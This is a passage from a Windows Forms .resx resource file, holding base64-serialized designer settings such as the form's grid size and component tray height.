ElBhYAAAAD4oCwygAAAAIAAAACAAAAAAAAAAAAAAABAAAAAAAAAAAAAAACAAAAAQABAQ8GAAAAAQAAAAgDAAAADwcAAAABAAAACAMAAAAL</value>
</data>
<data name="$this.GridSize" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAFRTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABNTeXN0ZW0uRHJhd2luZy5TaXplAgAAAAV3aWR0aAZoZWlnaHQAAAgIAgAAAAgAAAAIAAAACw==</value>
</data>
<data name="$this.TrayHeight" mimetype="application/x-microsoft.net.object.binary.base64">
<value>UAAAAA==</value>
</data>
</root>